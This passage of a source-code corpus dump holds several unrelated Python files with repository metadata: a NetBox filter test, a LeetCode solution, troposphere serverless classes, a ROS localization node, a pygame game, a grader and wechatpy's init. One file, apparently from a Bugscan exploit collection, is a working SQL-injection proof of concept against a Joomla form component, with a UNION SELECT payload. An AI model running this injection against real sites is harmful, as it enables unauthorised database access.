Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
)
Site.objects.bulk_create(sites)
racks = (
Rack(name='Rack 1', site=sites[0]),
Rack(name='Rack 2', site=sites[1]),
Rack(name='Rack 3', site=sites[2]),
)
Rack.objects.bulk_create(racks)
power_panels = (
PowerPanel(name='Power Panel 1', site=sites[0]),
PowerPanel(name='Power Panel 2', site=sites[1]),
PowerPanel(name='Power Panel 3', site=sites[2]),
)
PowerPanel.objects.bulk_create(power_panels)
power_feeds = (
PowerFeed(power_panel=power_panels[0], rack=racks[0], name='Power Feed 1', status=PowerFeedStatusChoices.STATUS_ACTIVE, type=PowerFeedTypeChoices.TYPE_PRIMARY, supply=PowerFeedSupplyChoices.SUPPLY_AC, phase=PowerFeedPhaseChoices.PHASE_3PHASE, voltage=100, amperage=100, max_utilization=10),
PowerFeed(power_panel=power_panels[1], rack=racks[1], name='Power Feed 2', status=PowerFeedStatusChoices.STATUS_FAILED, type=PowerFeedTypeChoices.TYPE_PRIMARY, supply=PowerFeedSupplyChoices.SUPPLY_AC, phase=PowerFeedPhaseChoices.PHASE_3PHASE, voltage=200, amperage=200, max_utilization=20),
PowerFeed(power_panel=power_panels[2], rack=racks[2], name='Power Feed 3', status=PowerFeedStatusChoices.STATUS_OFFLINE, type=PowerFeedTypeChoices.TYPE_REDUNDANT, supply=PowerFeedSupplyChoices.SUPPLY_DC, phase=PowerFeedPhaseChoices.PHASE_SINGLE, voltage=300, amperage=300, max_utilization=30),
)
PowerFeed.objects.bulk_create(power_feeds)
manufacturer = Manufacturer.objects.create(name='Manufacturer', slug='manufacturer')
device_type = DeviceType.objects.create(manufacturer=manufacturer, model='Model', slug='model')
device_role = DeviceRole.objects.create(name='Device Role', slug='device-role')
device = Device.objects.create(name='Device', device_type=device_type, device_role=device_role, site=sites[0])
power_ports = [
PowerPort(device=device, name='Power Port 1'),
PowerPort(device=device, name='Power Port 2'),
]
PowerPort.objects.bulk_create(power_ports)
Cable(termination_a=power_feeds[0], termination_b=power_ports[0]).save()
Cable(termination_a=power_feeds[1], termination_b=power_ports[1]).save()
def test_name(self):
params = {'name': ['Power Feed 1', 'Power Feed 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_status(self):
params = {'status': [PowerFeedStatusChoices.STATUS_ACTIVE, PowerFeedStatusChoices.STATUS_FAILED]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': PowerFeedTypeChoices.TYPE_PRIMARY}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_supply(self):
params = {'supply': PowerFeedSupplyChoices.SUPPLY_AC}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_phase(self):
params = {'phase': PowerFeedPhaseChoices.PHASE_3PHASE}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_voltage(self):
params = {'voltage': [100, 200]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_amperage(self):
params = {'amperage': [100, 200]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_max_utilization(self):
params = {'max_utilization': [10, 20]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_region(self):
regions = Region.objects.all()[:2]
params = {'region_id': [regions[0].pk, regions[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'region': [regions[0].slug, regions[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site_group(self):
site_groups = SiteGroup.objects.all()[:2]
params = {'site_group_id': [site_groups[0].pk, site_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site_group': [site_groups[0].slug, site_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_power_panel_id(self):
power_panels = PowerPanel.objects.all()[:2]
params = {'power_panel_id': [power_panels[0].pk, power_panels[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_rack_id(self):
racks = Rack.objects.all()[:2]
params = {'rack_id': [racks[0].pk, racks[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_cabled(self):
params = {'cabled': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'cabled': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_connected(self):
params = {'connected': True}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'connected': False}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
# TODO: Connection filters
| 48.240655
| 390
| 0.644821
|
8031fae69c226f98a26544a13f909b1f9cb52871
| 536
|
py
|
Python
|
python/141_linked_list_cycle.py
|
Tyler314/leetcode
|
53aaee13adfb91ae2f85f2db0208ddd94d81f643
|
[
"MIT"
] | null | null | null |
python/141_linked_list_cycle.py
|
Tyler314/leetcode
|
53aaee13adfb91ae2f85f2db0208ddd94d81f643
|
[
"MIT"
] | null | null | null |
python/141_linked_list_cycle.py
|
Tyler314/leetcode
|
53aaee13adfb91ae2f85f2db0208ddd94d81f643
|
[
"MIT"
] | null | null | null |
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def hasCycle(self, head):
"""
:type head: ListNode
:rtype: bool
"""
if not head:
return False
slow = head
fast = head.next
while fast and fast.next:
if slow == fast:
return True
slow = slow.next
fast = fast.next.next
return False
| 24.363636
| 36
| 0.496269
|
7b64dcc0445d600224b0b28414fb018d11bc5bc5
| 6,092
|
py
|
Python
|
troposphere/serverless.py
|
ridha/troposphere
|
4dc132c1816f1903ba71a27070c27fdb010f486c
|
[
"BSD-2-Clause"
] | null | null | null |
troposphere/serverless.py
|
ridha/troposphere
|
4dc132c1816f1903ba71a27070c27fdb010f486c
|
[
"BSD-2-Clause"
] | null | null | null |
troposphere/serverless.py
|
ridha/troposphere
|
4dc132c1816f1903ba71a27070c27fdb010f486c
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2017, Fernando Freire <fernando.freire@nike.com>
# All rights reserved.
#
# See LICENSE file for full license.
import types
from . import AWSObject, AWSProperty
from .awslambda import Environment, VPCConfig, validate_memory_size
from .dynamodb import ProvisionedThroughput, SSESpecification
from .s3 import Filter
from .validators import exactly_one, positive_integer
try:
from awacs.aws import PolicyDocument
policytypes = (dict, list, basestring, PolicyDocument)
except ImportError:
policytypes = (dict, list, basestring)
assert types # silence pyflakes
def primary_key_type_validator(x):
valid_types = ["String", "Number", "Binary"]
if x not in valid_types:
raise ValueError("KeyType must be one of: %s" % ", ".join(valid_types))
return x
class DeadLetterQueue(AWSProperty):
props = {
'Type': (basestring, False),
'TargetArn': (basestring, False)
}
def validate(self):
valid_types = ['SQS', 'SNS']
if ('Type' in self.properties and
self.properties['Type'] not in valid_types):
raise ValueError('Type must be either SQS or SNS')
class S3Location(AWSProperty):
props = {
"Bucket": (basestring, True),
"Key": (basestring, True),
"Version": (basestring, False)
}
class Hooks(AWSProperty):
props = {
"PreTraffic": (basestring, False),
"PostTraffic": (basestring, False)
}
class DeploymentPreference(AWSProperty):
props = {
"Type": (basestring, True),
"Alarms": (list, False),
"Hooks": (Hooks, False),
"Enabled": (bool, False)
}
class Function(AWSObject):
resource_type = "AWS::Serverless::Function"
props = {
'Handler': (basestring, True),
'Runtime': (basestring, True),
'CodeUri': ((S3Location, basestring), True),
'FunctionName': (basestring, False),
'Description': (basestring, False),
'MemorySize': (validate_memory_size, False),
'Timeout': (positive_integer, False),
'Role': (basestring, False),
'Policies': (policytypes, False),
'Environment': (Environment, False),
'VpcConfig': (VPCConfig, False),
'Events': (dict, False),
'Tags': (dict, False),
'Tracing': (basestring, False),
'KmsKeyArn': (basestring, False),
'DeadLetterQueue': (DeadLetterQueue, False),
'AutoPublishAlias': (basestring, False),
'DeploymentPreference': (DeploymentPreference, False)
}
class FunctionForPackaging(Function):
"""Render Function without requiring 'CodeUri'.
This exception to the Function spec is for use with the
`cloudformation/sam package` commands which add CodeUri automatically.
"""
resource_type = Function.resource_type
props = Function.props.copy()
props['CodeUri'] = (props['CodeUri'][0], False)
class Api(AWSObject):
resource_type = "AWS::Serverless::Api"
props = {
'StageName': (basestring, True),
'Name': (basestring, False),
'DefinitionBody': (dict, False),
'DefinitionUri': (basestring, False),
'CacheClusterEnabled': (bool, False),
'CacheClusterSize': (basestring, False),
'Variables': (dict, False),
}
def validate(self):
conds = [
'DefinitionBody',
'DefinitionUri',
]
exactly_one(self.__class__.__name__, self.properties, conds)
class PrimaryKey(AWSProperty):
props = {
'Name': (basestring, False),
'Type': (primary_key_type_validator, False)
}
class SimpleTable(AWSObject):
resource_type = "AWS::Serverless::SimpleTable"
props = {
'PrimaryKey': (PrimaryKey, False),
'ProvisionedThroughput': (ProvisionedThroughput, False),
'SSESpecification': (SSESpecification, False),
'Tags': (dict, False),
'TableName': (basestring, False),
}
class S3Event(AWSObject):
resource_type = 'S3'
props = {
'Bucket': (basestring, True),
'Events': (list, True),
'Filter': (Filter, False)
}
class SNSEvent(AWSObject):
resource_type = 'SNS'
props = {
'Topic': (basestring, True)
}
def starting_position_validator(x):
valid_types = ['TRIM_HORIZON', 'LATEST']
if x not in valid_types:
raise ValueError(
"StartingPosition must be one of: %s"
% ", ".join(valid_types)
)
return x
class KinesisEvent(AWSObject):
resource_type = 'Kinesis'
props = {
'Stream': (basestring, True),
'StartingPosition': (starting_position_validator, True),
'BatchSize': (positive_integer, False)
}
class DynamoDBEvent(AWSObject):
resource_type = 'DynamoDB'
props = {
'Stream': (basestring, True),
'StartingPosition': (starting_position_validator, True),
'BatchSize': (positive_integer, False)
}
class ApiEvent(AWSObject):
resource_type = 'Api'
props = {
'Path': (basestring, True),
'Method': (basestring, True),
'RestApiId': (basestring, False)
}
class ScheduleEvent(AWSObject):
resource_type = 'Schedule'
props = {
'Schedule': (basestring, True),
'Input': (basestring, False)
}
class CloudWatchEvent(AWSObject):
resource_type = 'CloudWatchEvent'
props = {
'Pattern': (dict, True),
'Input': (basestring, False),
'InputPath': (basestring, False)
}
class IoTRuleEvent(AWSObject):
resource_type = 'IoTRule'
props = {
'Sql': (basestring, True),
'AwsIotSqlVersion': (basestring, False)
}
class AlexaSkillEvent(AWSObject):
resource_type = 'AlexaSkill'
props = {}
class SQSEvent(AWSObject):
resource_type = 'SQS'
props = {
'Queue': (basestring, True),
'BatchSize': (positive_integer, True)
}
def validate(self):
if (not 1 <= self.properties['BatchSize'] <= 10):
raise ValueError('BatchSize must be between 1 and 10')
| 24.764228
| 79
| 0.613592
|
84657645a40f507e88db6fc69aa43a19d2c14048
| 8,112
|
py
|
Python
|
waypoint_nav/src/encoder_waypoint_localization.py
|
marcinolokk/DTU-R3-ROS
|
310f7dc6fbd53b49504112aabc2d5cac4c768660
|
[
"BSD-3-Clause"
] | 2
|
2018-09-19T08:39:51.000Z
|
2019-08-07T15:55:49.000Z
|
waypoint_nav/src/encoder_waypoint_localization.py
|
marcinolokk/DTU-R3-ROS
|
310f7dc6fbd53b49504112aabc2d5cac4c768660
|
[
"BSD-3-Clause"
] | null | null | null |
waypoint_nav/src/encoder_waypoint_localization.py
|
marcinolokk/DTU-R3-ROS
|
310f7dc6fbd53b49504112aabc2d5cac4c768660
|
[
"BSD-3-Clause"
] | 6
|
2018-06-08T12:12:16.000Z
|
2019-12-11T13:21:13.000Z
|
#!/usr/bin/env python
import rospy
import math
from pyproj import Proj
from R3_functions import quat_rot, fit_in_rad, debug_info
from bisect import bisect_left
# TF libraries
import tf
import tf2_ros
import tf2_msgs.msg
import tf2_geometry_msgs
# ROS messages
from std_msgs.msg import String
from sensor_msgs.msg import NavSatFix
from nav_msgs.msg import Odometry
from geometry_msgs.msg import Pose, PoseStamped, TransformStamped
# Class
class encoder_localization(object):
def __init__(self):
# Init ROS node
rospy.init_node('encoder_waypoint_localization')
self.verify_stamp = rospy.Time.now()
# Variables
self.projection = Proj(proj="utm", zone="34", ellps='WGS84')
self.tfBuffer = tf2_ros.Buffer()
self.tf_listener = tf2_ros.TransformListener(self.tfBuffer)
self.robot_odom = Odometry()
self.odom_list = [[],[]] # a list contains timestamp list and odom_pose list
self.odom_calibrating = False
self.list_cleaning = False
# rosparams
self.robot_frame = rospy.get_param("~waypoint_control/base_frame", "base_footprint")
self.gps_frame = rospy.get_param("~waypoint_control/gps_frame", "utm")
self.odom_frame = rospy.get_param("~waypoint_control/odom_frame", "odom")
# Publishers
self.robot_gps_pub = rospy.Publisher('robot_gps_pose', Odometry, queue_size = 10)
self.tf_pub = rospy.Publisher("tf", tf2_msgs.msg.TFMessage, queue_size=20, latch = True)
self.tf2_pub = rospy.Publisher("tf_static", tf2_msgs.msg.TFMessage, queue_size=20, latch = True)
self.debug_output = rospy.Publisher('debug_output', String, queue_size = 10)
# Subscribers
rospy.Subscriber('odo_calib_pose', Odometry, self.poseCB)
rospy.Subscriber('odom', Odometry, self.odomCB)
self.freq = 10
self.rate = rospy.Rate(self.freq)
def Start(self):
while not rospy.is_shutdown():
self.rate.sleep()
# ROS Callback functions
def poseCB(self, p):
self.odom_calibrating = True
robot_pose = Pose()
robot_pose = p.pose.pose
robot_pose.position.x, robot_pose.position.y = self.projection(p.pose.pose.position.x, p.pose.pose.position.y)
robot_pose.orientation.x = -p.pose.pose.orientation.x
robot_pose.orientation.y = -p.pose.pose.orientation.y
robot_pose.orientation.z = -p.pose.pose.orientation.z
robot_pose.orientation = quat_rot(robot_pose.orientation,0,0,90)
debug_info(self.debug_output, "Odom calib tf received")
# Align odometry with odom_calib and calculate offset
current_stamp = p.header.stamp
if len(self.odom_list[1]) <= 0:
return
i = bisect_left(self.odom_list[0], current_stamp)
if i >= len(self.odom_list[1]):
i = len(self.odom_list[1]) - 1
current_euler = tf.transformations.euler_from_quaternion((self.robot_odom.pose.pose.orientation.x, self.robot_odom.pose.pose.orientation.y, self.robot_odom.pose.pose.orientation.z, self.robot_odom.pose.pose.orientation.w))
bench_euler = tf.transformations.euler_from_quaternion((self.odom_list[1][i].orientation.x, self.odom_list[1][i].orientation.y, self.odom_list[1][i].orientation.z, self.odom_list[1][i].orientation.w))
offset_odom_x = self.robot_odom.pose.pose.position.x - self.odom_list[1][i].position.x
offset_odom_y = self.robot_odom.pose.pose.position.y - self.odom_list[1][i].position.y
offset_odom_z = self.robot_odom.pose.pose.position.z - self.odom_list[1][i].position.z
offset_odom_rz = current_euler[2] - bench_euler[2]
# Remove out dated elements after calculating offset
self.list_cleaning = True
self.odom_list[0] = self.odom_list[0][i+1:]
self.odom_list[1] = self.odom_list[1][i+1:]
self.list_cleaning = False
try:
odo_utm_trans = self.tfBuffer.lookup_transform(self.gps_frame, self.odom_frame, rospy.Time())
odo_utm_euler = tf.transformations.euler_from_quaternion((odo_utm_trans.transform.rotation.x, odo_utm_trans.transform.rotation.y, odo_utm_trans.transform.rotation.z, odo_utm_trans.transform.rotation.w))
theta = odo_utm_euler[2]
robot_pose.position.x += offset_odom_x * math.cos(theta) - offset_odom_y * math.sin(theta)
robot_pose.position.y += offset_odom_x * math.sin(theta) + offset_odom_y * math.cos(theta)
robot_pose.position.z += offset_odom_z
robot_pose.orientation = quat_rot(robot_pose.orientation,0,0,math.degrees(offset_odom_rz))
debug_info(self.debug_output, "Odometry offset calculated")
except:
debug_info(self.debug_output, "Initialise odometry frame in utm")
# odom to reference
while True:
try:
odo_ref_trans = self.tfBuffer.lookup_transform(self.robot_frame, self.odom_frame, rospy.Time())
tf_odo_ref = TransformStamped()
tf_odo_ref.header.frame_id = "odom_utm_calib"
tf_odo_ref.child_frame_id = self.odom_frame
tf_odo_ref.header.stamp = rospy.Time.now()
tf_odo_ref.transform = odo_ref_trans.transform
tfmsg_odo_ref = tf2_msgs.msg.TFMessage([tf_odo_ref])
self.tf_pub.publish(tfmsg_odo_ref)
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
debug_info(self.debug_output, "Publishing odometry calibration")
continue
# reference to utm
tf_ref_utm = TransformStamped()
tf_ref_utm.header.frame_id = self.gps_frame
tf_ref_utm.child_frame_id = "odom_utm_calib"
tf_ref_utm.header.stamp = rospy.Time.now()
tf_ref_utm.transform.translation.x = robot_pose.position.x
tf_ref_utm.transform.translation.y = robot_pose.position.y
tf_ref_utm.transform.translation.z = robot_pose.position.z
tf_ref_utm.transform.rotation = robot_pose.orientation
tfmsg_ref_utm = tf2_msgs.msg.TFMessage([tf_ref_utm])
self.tf2_pub.publish(tfmsg_ref_utm)
self.rate.sleep()
# Check the tf exists correctly
try:
trans = self.tfBuffer.lookup_transform(self.gps_frame, "odom_utm_calib", rospy.Time())
trans2 = self.tfBuffer.lookup_transform("odom_utm_calib", self.odom_frame, rospy.Time())
if math.fabs(trans.transform.translation.x - robot_pose.position.x) > 0.1 or math.fabs(trans.transform.translation.y - robot_pose.position.y) > 0.1:
continue
self.odom_calibrating = False
debug_info(self.debug_output, "Odometry calibrated")
break
except:
continue
self.verify_stamp = tf_odo_ref.header.stamp
def odomCB(self, odo):
self.robot_odom = odo
if not self.list_cleaning:
self.odom_list[0].append(odo.header.stamp)
self.odom_list[1].append(odo.pose.pose)
if self.odom_calibrating:
self.rate.sleep()
return
try:
trans = self.tfBuffer.lookup_transform(self.gps_frame, self.odom_frame, rospy.Time())
if self.verify_stamp > trans.header.stamp:
debug_info(self.debug_output, "Looking up transformations")
return
robot_odom_pose = PoseStamped()
robot_odom_pose.pose = self.robot_odom.pose.pose
pose_transformed = tf2_geometry_msgs.do_transform_pose(robot_odom_pose, trans)
robot_gps_pose = Odometry()
robot_gps_pose.header.frame_id = self.gps_frame
robot_gps_pose.child_frame_id = self.robot_frame
robot_gps_pose.pose.pose = pose_transformed.pose
robot_gps_pose.pose.pose.position.x,robot_gps_pose.pose.pose.position.y = self.projection(pose_transformed.pose.position.x,pose_transformed.pose.position.y,inverse=True)
robot_gps_pose.pose.pose.orientation.x = -pose_transformed.pose.orientation.x
robot_gps_pose.pose.pose.orientation.y = -pose_transformed.pose.orientation.y
robot_gps_pose.pose.pose.orientation.z = -pose_transformed.pose.orientation.z
robot_gps_pose.pose.pose.orientation = quat_rot(robot_gps_pose.pose.pose.orientation,0,0,90)
self.robot_gps_pub.publish(robot_gps_pose)
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
return
if __name__ == '__main__':
encoder = encoder_localization()
encoder.Start()
| 45.573034
| 226
| 0.727934
|
bd89e70ef0f1ae97faab6d60af612063a44f7849
| 3,865
|
py
|
Python
|
examples/debug_test.py
|
designer-edu/designer
|
9c5d004e934300a30fb6d3148f4db313b69057df
|
[
"MIT"
] | 3
|
2022-01-21T00:08:02.000Z
|
2022-03-09T19:00:26.000Z
|
examples/debug_test.py
|
designer-edu/designer
|
9c5d004e934300a30fb6d3148f4db313b69057df
|
[
"MIT"
] | 5
|
2022-02-20T15:44:34.000Z
|
2022-03-05T15:57:25.000Z
|
examples/debug_test.py
|
designer-edu/designer
|
9c5d004e934300a30fb6d3148f4db313b69057df
|
[
"MIT"
] | null | null | null |
from designer import *
import random
from designer.objects.image import Image
WATER_DROP_SPEED = 5
PLANE_SPEED = 5
set_window_title(None)
World = {
'fires': [DesignerObject],
'drops': [DesignerObject],
'plane': DesignerObject,
'score': int,
'counter': DesignerObject
}
def create_world():
plane = create_plane()
return {
'fires': [],
'drops': [],
'plane': plane,
'score': 0,
'counter': text('black', '', 30, get_width() / 2, 100)
}
def create_water_drop() -> DesignerObject:
return circle("blue", 5)
def create_plane() -> DesignerObject:
plane = image("airplane.png")
plane['scale'] = .25
plane['hspeed'] = PLANE_SPEED
return plane
def create_fire(size=.1) -> DesignerObject:
fire = image('fire.png', anchor="midbottom", scale=.1)
fire['x'] = random.randint(0, get_width())
fire['y'] = get_height()
fire['scale_y'] = size
return fire
def go_right(plane):
plane['hspeed'] = PLANE_SPEED
plane['flip_x'] = False
def go_left(plane):
plane['hspeed'] = -PLANE_SPEED
plane['flip_x'] = True
def move_plane(world):
world['plane']['x'] += world['plane']['hspeed']
if world['plane']['x'] < 0:
go_right(world['plane'])
elif world['plane']['x'] > get_width():
go_left(world['plane'])
def flip_plane(world, key):
if key == 'left':
go_left(world['plane'])
elif key == 'right':
go_right(world['plane'])
def drop_water(world, key):
if key == 'space':
new_drop = create_water_drop()
move_below(new_drop, world['plane'])
world['drops'].append(new_drop)
def move_below(bottom, top):
bottom['y'] = top['y'] + top['height']/2
bottom['x'] = top['x']
def drop_waters(world):
kept = []
for drop in world['drops']:
drop['y'] += WATER_DROP_SPEED
if drop['y'] < get_height():
kept.append(drop)
else:
destroy(drop)
world['drops'] = kept
def filter_from(values, from_list):
result = []
for value in values:
if value not in from_list:
result.append(value)
return result
def collide_water_fire(world):
destroyed_fires = []
destroyed_drops = []
for drop in world['drops']:
for fire in world['fires']:
if colliding(drop, fire):
if drop not in destroyed_drops:
destroyed_drops.append(drop)
destroy(drop)
if fire not in destroyed_fires:
destroyed_fires.append(fire)
destroy(fire)
world['score'] += 1
world['drops'] = filter_from(world['drops'], destroyed_drops)
world['fires'] = filter_from(world['fires'], destroyed_fires)
def update_counter(world):
world['counter']['text'] = str(world['score'])
def grow_fire(world):
for fire in world['fires']:
fire['scale'] += .0001 * (1 + world['score'])
if len(world['fires']) < 8 and not random.randint(0, 10 * len(world['fires'])):
new_fire = create_fire()
linear_animation(new_fire, 'alpha', 0, 1.0, 3)
world['fires'].append(new_fire)
def there_are_big_fires(world):
any_big_fires_so_far = False
for fire in world['fires']:
any_big_fires_so_far = any_big_fires_so_far or fire['scale_x'] >= 1
return any_big_fires_so_far
def print_score(world):
print("Your score was", world['score'])
def flash_game_over(world):
world['counter']['text'] = "GAME OVER!"
when("starting", create_world)
when('updating', move_plane)
when('updating', drop_waters)
when('updating', grow_fire)
when('updating', collide_water_fire)
when('updating', update_counter)
when('typing', drop_water)
when('typing', flip_plane)
when(there_are_big_fires, print_score, flash_game_over, pause)
debug()
| 24.15625
| 83
| 0.604916
|
eb91e56fffaadff5ef800a4db07ff524a64d3b95
| 131
|
py
|
Python
|
estimation/estimate_data.py
|
AnonTendim/si-library
|
f5f66e27b8db245c9f77c993bb1c1a38b1231d1d
|
[
"MIT"
] | 1
|
2022-03-15T00:24:08.000Z
|
2022-03-15T00:24:08.000Z
|
estimation/estimate_data.py
|
AnonTendim/si-library
|
f5f66e27b8db245c9f77c993bb1c1a38b1231d1d
|
[
"MIT"
] | null | null | null |
estimation/estimate_data.py
|
AnonTendim/si-library
|
f5f66e27b8db245c9f77c993bb1c1a38b1231d1d
|
[
"MIT"
] | 1
|
2021-12-27T18:47:27.000Z
|
2021-12-27T18:47:27.000Z
|
import utils.diagnosis_utils
def main():
path = 'data/'
filename = 'sample_input'
# TODO
if __name__ == "__main__":
main()
| 14.555556
| 28
| 0.664122
|
c9be83e932dedc42be6a3e3928a703831d590ec6
| 814
|
py
|
Python
|
Bugscan_exploits-master/exp_list/exp-560.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
Bugscan_exploits-master/exp_list/exp-560.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
Bugscan_exploits-master/exp_list/exp-560.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
POC Name : Joomla Spider Form Maker <=3.4 SQL
References: http://www.exploit-db.com/exploits/34637/
Author : ko0zhi
"""
def assign(service, arg):
if service == "joomla":
return True, arg
def audit(arg):
payload = '/index.php?option=com_formmaker&view=formmaker&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT(0x7165696a71,IFNULL(CAST(md5(3.1415)%20AS%20CHAR),0x20),0x7175647871),NULL,NULL,NULL,NULL,NULL,NULL,NULL%23'
url = arg + payload
code, head, res, errcode, _ = curl.curl('"%s"' % url)
if code == 200 and "63e1f04640e83605c1d177544a5a0488" in res:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('joomla', 'http://www.example.com/')[1])
| 35.391304
| 233
| 0.652334
|
0be655fcbc69d87da1ec9717e667570932a1848d
| 1,952
|
py
|
Python
|
temas/Python3/correctores/listas/listas1.py
|
emartinm/TutorialesInteractivos
|
c0ef4d2c9449ea94e9a0ee4169faad5e47c874bc
|
[
"MIT"
] | 2
|
2016-12-13T12:29:15.000Z
|
2017-02-09T11:06:24.000Z
|
temas/Python3/correctores/listas/listas1.py
|
emartinm/TutorialesInteractivos
|
c0ef4d2c9449ea94e9a0ee4169faad5e47c874bc
|
[
"MIT"
] | null | null | null |
temas/Python3/correctores/listas/listas1.py
|
emartinm/TutorialesInteractivos
|
c0ef4d2c9449ea94e9a0ee4169faad5e47c874bc
|
[
"MIT"
] | null | null | null |
# -*- coding: UTF-8 -*-
import sys
from correctores.common.corrector_funciones import corrector_funciones
########################################################################
#### Esto es lo que hay que cambiar en cada problema: ####
#### - epsilon: para comparar floats y complex, si lo necesitas ####
#### - genera_casos: devuelve una lista de casos de prueba ####
#### - función que queremos comprobar, con su hueco ####
#### - get_function: devuelve la función que queremos comprobar ####
########################################################################
def epsilon():
return 1E-9
def correct_eval_poly(d):
"""This function evaluates the polynomial poly at point x.
Poly is a list of floats containing the coeficients
of the polynomial
poly[i] -> coeficient of degree i
Parameters
----------
poly: [float]
Coefficients of the polynomial,
where poly[i] -> coeficient of degree i
x : float
Point
Returns
-------
float
Value of the polynomial at point x
Example
-------
>>> eval_poly( [1.0, 1.0], 2)
3.0
"""
poly, x = d["poly"], d['x']
result = 0.0
power = 1
degree = len(poly) - 1
i = 0
while i <= degree:
result = result + poly[i] * power
power = power * x
i = i + 1
return (d,result)
def genera_casos():
# Generar los casos de prueba que se quieren comprobar
param_list = [{'poly':[2.0,0.0,1.0],'x':3.0},{'poly':[2.0,3.0,1.0],'x':-3.0},{'poly':[],'x':3.0}]
return map(correct_eval_poly,param_list)
def eval_poly(poly, x):
@@@CODE@@@
def get_function():
return eval_poly
#################################
#### Esto no hay que tocarlo ####
#################################
if __name__ == "__main__":
corrector_funciones(sys.argv[1], get_function(), genera_casos(), epsilon())
| 26.739726
| 101
| 0.512807
|
85b34771ebed60fe968fd1aab89d6d20c6ef783d
| 1,001
|
py
|
Python
|
generator/group.py
|
Margoburrito/python_training_hw
|
836c4445f1821bac4df76418a1c8178d18b616c1
|
[
"Apache-2.0"
] | null | null | null |
generator/group.py
|
Margoburrito/python_training_hw
|
836c4445f1821bac4df76418a1c8178d18b616c1
|
[
"Apache-2.0"
] | null | null | null |
generator/group.py
|
Margoburrito/python_training_hw
|
836c4445f1821bac4df76418a1c8178d18b616c1
|
[
"Apache-2.0"
] | null | null | null |
from model.group import Group
import random
import string
import os.path
import jsonpickle
import getopt
import sys
try:
opts, args = getopt.getopt(sys.argv[1:], "n:f:", ["number of groups", "file"])
except getopt.GetoptError as err:
getopt.usage()
sys.exit(2)
n = 5
f = "data/groups.json"
for o, a in opts:
if o == "-n":
n = int(a)
elif o == "-f":
f = a
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits + string.punctuation + " "*10
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
testdata = [Group(name="", header="", footer="")] + [
Group(name=random_string("name", 10), header=random_string("header", 20), footer=random_string("footer", 20))
for i in range(n)
]
file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", f)
with open(file, "w") as out:
jsonpickle.set_encoder_options("json", indent=2)
out.write(jsonpickle.encode(testdata))
| 25.025
| 113
| 0.654346
|
368eb49f03f9e6eadabe92b733c0d09c13281ba9
| 841
|
py
|
Python
|
wechatpy/__init__.py
|
hunter007/wechatpy
|
5bd3587dde3a25d47bd72ba0b1949c2b47882fb7
|
[
"MIT"
] | null | null | null |
wechatpy/__init__.py
|
hunter007/wechatpy
|
5bd3587dde3a25d47bd72ba0b1949c2b47882fb7
|
[
"MIT"
] | null | null | null |
wechatpy/__init__.py
|
hunter007/wechatpy
|
5bd3587dde3a25d47bd72ba0b1949c2b47882fb7
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import, unicode_literals
import logging
from wechatpy.client import WeChatClient # NOQA
from wechatpy.component import ComponentOAuth, WeChatComponent # NOQA
from wechatpy.exceptions import WeChatClientException, WeChatException, WeChatOAuthException, WeChatPayException # NOQA
from wechatpy.oauth import WeChatOAuth # NOQA
from wechatpy.parser import parse_message # NOQA
from wechatpy.pay import WeChatPay # NOQA
from wechatpy.replies import create_reply # NOQA
__version__ = '1.6.0'
__author__ = 'messense'
# Set default logging handler to avoid "No handler found" warnings.
try: # Python 2.7+
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
| 33.64
| 120
| 0.785969
|
be3add7fde6e211808e2d8fa8817664e248d06c5
| 97
|
py
|
Python
|
curso-em-video/resposta_usuario.py
|
mvrramos/Pogramacao-Python
|
4b289372aed3080c55a94beed3ea059619d51e48
|
